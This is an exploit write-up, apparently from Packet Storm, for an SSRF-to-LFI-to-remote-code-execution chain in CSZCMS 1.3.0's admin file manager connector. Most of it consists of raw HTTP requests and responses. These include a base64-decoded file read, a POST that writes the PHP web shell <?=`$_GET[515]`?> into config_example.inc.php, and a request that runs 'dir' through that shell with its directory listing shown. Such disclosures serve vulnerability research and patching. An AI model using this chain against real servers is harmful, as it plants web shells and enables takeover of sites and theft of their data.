Exploit for CSZCMS 1.3.0 SSRF / LFI / Remote Code Execution

## https://sploitus.com/exploit?id=PACKETSTORM:166613
# Title: CSZCMS V1.3.0 - SSRF To LFI To Rce  
# Author: Hejap Zairy  
# Date: 07.04.2022  
# Vendor: https://sourceforge.net/projects/cszcms/files/install/  
# Software: https://liquidtelecom.dl.sourceforge.net/project/cszcms/install/CSZCMS-V1.3.0.zip  
# Reference: https://github.com/Matrix07ksa  
# Tested on: Windows, MySQL, Apache  
  
  
# 1 - step inject ssrf   
# 2 - inject SSRF to LFI  
# 3 - Inject SSRF to LFI to RCE put webshell config  
  
#vulnerability Code php  
Needs more filtering commands  
  
  
```  
protected static $base64encodeSessionData = false;  
protected $commands = array(  
'abort' => array('id' => true),  
'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false),  
'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false),  
'chmod' => array('targets' => true, 'mode' => true),  
'dim' => array('target' => true, 'substitute' => false),  
'duplicate' => array('targets' => true, 'suffix' => false),  
'editor' => array('name' => true, 'method' => true, 'args' => false),  
'extract' => array('target' => true, 'mimes' => false, 'makedir' => false),  
'file' => array('target' => true, 'download' => false, 'cpath' => false, 'onetime' => false),  
'get' => array('target' => true, 'conv' => false),  
'info' => array('targets' => true, 'compare' => false),  
'ls' => array('target' => true, 'mimes' => false, 'intersect' => false),  
'mkdir' => array('target' => true, 'name' => false, 'dirs' => false),  
'mkfile' => array('target' => true, 'name' => true, 'mimes' => false),  
'netmount' => array('protocol' => true, 'host' => true, 'path' => false, 'port' => false, 'user' => false, 'pass' => false, 'alias' => false, 'options' => false),  
'open' => array('target' => false, 'tree' => false, 'init' => false, 'mimes' => false, 'compare' => false),  
'parents' => array('target' => true, 'until' => false),  
'paste' => array('dst' => true, 'targets' => true, 'cut' => false, 'mimes' => false, 'renames' => false, 'hashes' => false, 'suffix' => false),  
'put' => array('target' => true, 'content' => '', 'mimes' => false, 'encoding' => false),  
'rename' => array('target' => true, 'name' => true, 'mimes' => false, 'targets' => false, 'q' => false),  
'resize' => array('target' => true, 'width' => false, 'height' => false, 'mode' => false, 'x' => false, 'y' => false, 'degree' => false, 'quality' => false, 'bg' => false),  
'rm' => array('targets' => true),  
'search' => array('q' => true, 'mimes' => false, 'target' => false, 'type' => false),  
'size' => array('targets' => true),  
'subdirs' => array('targets' => true),  
'tmb' => array('targets' => true),  
'tree' => array('target' => true),  
'upload' => array('target' => true, 'FILES' => true, 'mimes' => false, 'html' => false, 'upload' => false, 'name' => false, 'upload_path' => false, 'chunk' => false, 'cid' => false, 'node' => false, 'renames' => false, 'hashes' => false, 'suffix' => false, 'mtime' => false, 'overwrite' => false, 'contentSaveId' => false),  
'url' => array('target' => true, 'options' => false),  
'zipdl' => array('targets' => true, 'download' => false)  
);  
```  
  
[+] Payload GET  
  
#l1_MGRheS5waHA= base64 decode 0day.php  
#l3_Y3N6ZGVmYXVsdC9tYWluLnBocA base64 decode main.php  
  
  
```  
GET /cms/index.php/admin/filemanager/connector/?cmd=get&targets=http://127.0.0.1/cms/index.php/admin/filemanager/connector/?cmd=file&target=l1_MGRheS5waHA= HTTP/1.1  
Host: 127.0.0.1  
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: none  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Accept-Encoding: gzip, deflate  
Accept-Language: ar,en-US;q=0.9,en;q=0.8  
Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=h0nht0te0u73bbvu8e12lt2bmvfbepfn  
Connection: close  
  
  
```  
  
  
#Status: CRITICAL  
  
#Response   
```  
{"content":"data:image\/png;base64,PD89YCRfR0VUWzUxNV1gPz4NCg=="}  
# <?=`$_GET[515]`?> decode base64   
  
```  
  
  
  
  
# Requests   
```  
POST /cms/admin/filemanager/connector/ HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 128  
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"  
Accept: application/json, text/javascript, */*; q=0.01  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://127.0.0.1  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://127.0.0.1/cms/admin/filemanager  
Accept-Encoding: gzip, deflate  
Accept-Language: ar,en-US;q=0.9,en;q=0.8  
Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed  
Connection: close  
  
cmd=put&target=l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA&encoding=UTF-8&content=%3C%3F%3D%60%24_GET%5B515%5D%60%3F%3E&reqid=18002b807a32  
```  
  
  
  
  
  
  
  
#Response   
  
```  
HTTP/1.1 200 OK  
Date: Thu, 07 Apr 2022 06:31:19 GMT  
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27  
X-XSS-Protection: 1; mode=block  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Options: nosniff  
X-Powered-By: PHP/7.4.27  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: max-age=3600, must-revalidate  
Pragma: no-cache  
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly  
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; path=/; domain=127.0.0.1; HttpOnly  
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly  
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly  
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly  
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly  
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly  
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly  
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly  
Content-Length: 190  
Connection: keep-alive, close  
Content-Type: application/json; charset=utf-8  
  
{"changed":[{"isowner":false,"ts":1649313079,"mime":"text\/x-php","read":1,"write":1,"size":"17","hash":"l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA","name":"config_example.inc.php","phash":"l6_Lw"}]}  
```  
  
  
  
  
  
  
#webshell  
  
```  
GET /cms/config_example.inc.php?515=dir HTTP/1.1  
Host: 127.0.0.1  
Cache-Control: max-age=0  
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: none  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Accept-Encoding: gzip, deflate  
Accept-Language: ar,en-US;q=0.9,en;q=0.8  
Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed  
Connection: close  
  
  
```  
  
  
  
#response   
  
```  
HTTP/1.1 200 OK  
Date: Thu, 07 Apr 2022 06:37:33 GMT  
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27  
X-XSS-Protection: 1; mode=block  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Options: nosniff  
X-Powered-By: PHP/7.4.27  
Connection: keep-alive, close  
Cache-Control: max-age=3600, must-revalidate  
Content-Length: 1917  
Content-Type: text/html; charset=UTF-8  
  
Volume in drive C is OS  
Volume Serial Number is 2EF1-9DCA  
  
Directory of C:\xampp\htdocs\cms  
  
04/07/2022 09:13 AM <DIR> .  
04/07/2022 02:23 AM <DIR> ..  
04/30/2019 05:29 PM 8,444 .htaccess  
04/07/2022 09:13 AM <DIR> .quarantine  
04/07/2022 09:13 AM <DIR> .tmb  
04/07/2022 07:07 AM 8 127.0.0.1_csv_banner_mgt_20220407.csv  
04/07/2022 07:14 AM 5,362 127.0.0.1_files_20220407.zip  
04/07/2022 07:14 AM 54,888 127.0.0.1_photo_20220407.zip  
04/07/2022 06:57 AM <DIR> assets  
04/09/2018 03:34 PM 479 cache.config.inc.php  
11/29/2021 07:40 AM 4,733 CHANGELOG  
04/07/2022 06:55 AM 696 config.inc.php  
04/07/2022 09:37 AM 17 config_example.inc.php  
08/07/2018 05:18 AM 4,075 CONTRIBUTING.md  
04/21/2021 07:01 AM 151,259 corecss.css  
04/21/2021 07:01 AM 378,086 corejs.js  
04/07/2022 06:57 AM <DIR> cszcms  
06/28/2019 09:04 PM 166 devtoolsbar.config.inc.php  
04/07/2022 06:55 AM 690 env.config.inc.php  
04/07/2022 06:55 AM 269 htaccess.config.inc.php  
06/28/2019 02:48 PM 11,526 index.php  
04/07/2022 06:57 AM <DIR> install  
01/28/2020 06:40 AM 3,439 LICENSE.md  
04/09/2018 03:35 PM 336 memcached.config.inc.php  
04/09/2018 03:34 PM 1,297 nginx_example.com.conf  
04/07/2022 09:13 AM <DIR> photo  
04/09/2021 09:52 AM 1,744 proxy.inc.php  
11/11/2021 07:48 AM 1,868 README.md  
04/09/2018 03:35 PM 496 redis.config.inc.php  
11/11/2021 07:46 AM 520 SECURITY.md  
04/07/2022 06:57 AM <DIR> system  
04/07/2022 09:13 AM <DIR> templates  
22 File(s) 630,398 bytes  
10 Dir(s) 80,676,995,072 bytes free  
  
```  
  
# Description:  
the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials   
to Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce  
  
  
# Proof and Exploit:  
https://i.imgur.com/pzWjkXI.png  
https://i.imgur.com/xxjxnGk.png  
https://i.imgur.com/S1F7MaJ.png  
https://i.imgur.com/BwWTfYU.png